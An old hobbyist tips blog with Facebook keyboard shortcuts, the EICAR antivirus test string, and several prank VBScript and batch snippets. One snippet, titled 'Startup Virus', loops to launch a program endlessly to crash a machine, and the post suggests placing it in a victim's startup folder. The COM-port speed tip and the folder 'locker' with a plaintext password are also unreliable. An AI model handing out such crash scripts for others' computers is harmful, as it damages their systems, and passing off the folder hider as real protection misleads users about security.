Blogger Widgets

Thursday, September 27, 2012

Chatting with PC !


Hi friends,
The below code will make your PC chat with you.To do this, just copy the below code and paste it in notepad and save it as anyname.vbs

dim fname
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")


Enjoy !

Facebook shortcut keys !


Facebook is the most popular social network now. Millions of users use it. I hope all of bloggers use facebook. Do you know, there are more shortcut keys for Facebook, You can open new massage,search shortcut,home page shortcut and more. So, It helps to do some important works without moving courser. Shortcuts are sometime different from internet browser. So,i will include all for you.


New message
Chrome:   ALT + M
Firefox:    SHIFT + ALT + M
Explorer : ALT + M + ENTER

SearchShortcut
Chrome:   ALT + ?
Firefox:    SHIFT + ALT + ?
Explorer : ALT + ? + ENTER

Home Page / News Feed
Chrome:   ALT + 1
Firefox:    SHIFT + ALT + 1
Explorer : ALT + 1 + ENTER

Profile Page
Chrome:   ALT + 2
Firefox:    SHIFT + ALT + 2
Explorer : ALT + 2 + ENTER

Friend Request
Chrome:   ALT + 3
Firefox:    SHIFT + ALT + 3
Explorer : ALT + 3 + ENTER

Message Shortcut
Chrome:   ALT + 4
Firefox:    SHIFT + ALT + 4
Explorer : ALT + 4 + ENTER

Notifications
Chrome:   ALT + 5
Firefox:    SHIFT + ALT + 5
Explorer : ALT + 5 + ENTER

Account Setting
Chrome:   ALT + 6
Firefox:    SHIFT + ALT + 6
Explorer : ALT + 6 + ENTER

Privacy Setting
Chrome:   ALT + 7
Firefox:    SHIFT + ALT + 7
Explorer : ALT + 7 + ENTER

Facebook Official Page
Chrome:   ALT + 8
Firefox:    SHIFT + ALT + 8
Explorer : ALT + 8 + ENTER

Service Agreement
Chrome:   ALT + 9
Firefox:    SHIFT + ALT + 9
Explorer : ALT + 9 + ENTER

Help Center
Chrome:   ALT + 0
Firefox:    SHIFT + ALT + 0
Explorer : ALT + 0 + ENTER

You can Like or unlike photos by press 'L' with any browser.

Hope this help to you.


Don't try it on your computer !



Hi friends,
Here is the code by which your system can get affected.But be careful, after doing this you will need to either end some processes or restart your computer. To do it, just copy the below code and paste it in notepad and save it as anyname.vbs
 
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys("Your message")
wshshell.sendkeys("Your message")
wshshell.sendkeys("Your message")
loop


Increase internet speed upto maximum available !


Hi friends,
Do you want to increase your internet speed upto maximum available? If you want to do that, then follow these steps,
Step1 : Right Click on my Computer
Step2 : Selects the Properties Tag
Step3 : Now a New Window opens, Select The Hardware and Then Select Device Manager.

Step4 : Now a  New Window will open . Click on the + sign in front of Ports and select the Communication Ports and Double Click on It.
Step5:  A new window Will Open . Now Select the Port Settings and Change the Settings as shown in figure and Click on Okay.

That's all the Procedure. Now restart your computer and Experience . You will experience that your Internet speed is better than previous.



Enjoy !

Monday, September 24, 2012

Check effectiveness of your Antivirus


Have you ever wondered that is your Antivirus working properly? Do you want to ensure that your antivirus works properly? So don't worry we have got a perfect working solution which will make you to Check Effectiveness of your Antivirus.The test for this purpose is called EICAR Test. This test is used by many antivirus developers to find whether there antivirus is working properly or not.Here is a step-by-step procedure to test your antivirus:


1. Open notepad (Click start menu goto run and type notepad.)

2. Type there the following code and save it as virustestfile.com.
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. Now run Antivirus scan or it will delete the file automatically on saving. {If your antivirus deletes the file than it is working properly otherwise not !}


Enjoy !

Monday, September 3, 2012

Startup Virus

Hi Friends,
Just copy this to notepad and save it as anyname.vbs and one new file will be created, by opening that file, it will only crash your computer but u can put it in the startup folder of the victims computer:

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next





Enjoy !

CD drive eject & load automatically

Hi friends,
Today I will show you a magic that you can see yourself. Just copy the below code,
paste it in notepad and save it as anyname.vbs. After doing so, one new file will
be created and by opening that new file your CD drive will eject and load  
Automatically! It will not stop automatically.

To stop it-
1. Open task manager
2. Go to 'Process' tab
3. End the process of wscript.exe
 
and the code is-
 
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
 
 
Enjoy !

Online TV website


Hi friends,
You can now watch online TV and you will not need any software (that I think so). To do this you have to go to www.newtvworld.com.


Enjoy !

Saturday, September 1, 2012

Lock a folder without software !

1- Make a new folder ( name it as you like )

2- Inside this folder make a ( TXT ) file & copy inside it this (the entire thing) that is written below.




Quote:

Quote: cls

@ECHO OFF

title Folder Private

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK

if NOT EXIST Private goto MDLOCKER

:CONFIRM

echo Are you sure you want to lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.

goto CONFIRM

:LOCK

ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End

:UNLOCK

echo Enter password to unlock folder

set/p "pass=>"

if NOT %pass%== password here goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private

echo Folder Unlocked successfully

goto End

:FAIL

echo Invalid password

goto end

:MDLOCKER

md Private

echo Private created successfully

goto End

:End



3- After u copy the Commanding go to line 23 (or try using shortcut- CTRL+F and type password to locate the line) u will find this word : password here (Change it with any password u like.) is :

eg: if NOT %pass%== narnia1234 goto FAIL
//so ur password here becomes narnia1234 .//


4- After that go to "save as" & name this file as "locker.bat "

5- Now back to the folder & u will find a ( LOCKER ) commanding. (locker.exe)

6- Double Click on it & u will find a new folder (Private )

7- Ok ,, Now copy what u want in this "private Folder" & after that come out of the folder, and Double click on locker again. It will open and ask if you want to lock your folder? Y/N ?

8- Type Y. your private folder will dissapear.

9- If you want to UNLOCK your folder ,go to (locker) & type your pass and you will see your private folder.

It not only hides the fodler, but incase, u unhide all files... and try opening it without entering password, it will take u to the control panel...
Also, if u want to store files on your Pen-Drive, u can use this script. No Software Required

Incase u delete your Locker file (just in case), then u can make a new one (but with the same password) and open it from that.

Alternatively, u can keep this locker file somewhere else, and when u want to open ur folder, only then bring it back to that place ..
Email ThisBlogThis!Share to TwitterShare to Facebook
To get latest updates, Subscribe here !!!

 

Get Latest Updates: Subscribe Now | Like Us On Facebook

X